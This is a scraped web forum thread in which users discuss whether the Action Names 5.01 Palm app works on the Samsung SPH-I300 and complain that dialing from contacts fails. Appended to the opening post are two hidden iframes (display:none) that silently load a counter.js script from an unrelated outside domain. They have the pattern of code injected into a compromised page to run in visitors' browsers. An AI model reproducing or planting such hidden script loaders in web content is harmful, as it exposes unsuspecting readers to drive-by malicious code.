+ Reply to Thread
    BD1

Question Action Names 5.01: does it work with i300?

I just noticed iambic posted 5.01. Does anyone know if this works with the i300? I recall some postings when 5.0 was released that iambic was not yet supporting the i300.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

i300 User

Action Manes 5.x

Yea - it works - but you lose your dial-from-the-addressbook functionality - there is no little phone icon to dial a number directly from the addressbook. That was enough for me to uninstall Action Names.

gf

Beams from above...
    I saw a post on Iambic's board that indicated that they were interested in including the dialing function, but that Samsung had not produced a developer's kit that would make it possible.

Here's hoping...

John

"I saw a post on Iambic's board that indicated that they were interested in including the dialing function, but that Samsung had not produced a developer's kit that would make it possible. "

Interesting... I was just looking into installing Action Names and from what I see on their web site, they claim to support this (though I haven't taken the time to install and try it yet). They even have a picture of the i300 on the page describing this feature.

http://www.iambic.com/english/palmos...es/feat13.html

Jim

i300 User
    I installed AN 5.1 again and tried to use the dialer feature but get an error that says that it is not compatible with my phone when I try to dial from contact view.

Has anyone actually used this and had it work with their I300? Everything else works great - I LOVE AN 5.1 - just wish I could dial from the contact page rather than mumbling 10-digit numbers under my breath over and over until I can enter them into the phone function manually.

Thanks!

gf

To date there are no third-party apps that can dial the SPH-I300 internally (at least that I know of). Samsung hasn't made a developer's kit available, so nobody knows how to make their own software tell the I300 to dial.

It's funny, I've seen the Kyocera smartphone described as primarily a phone, versus the Samsung as primarily a Palm, and for the most part I agree with these characterizations. The glaring exception, though, is that Samsung, as a company, doesn't seem interested in supporting third-party developers. I hope they come around soon.

Q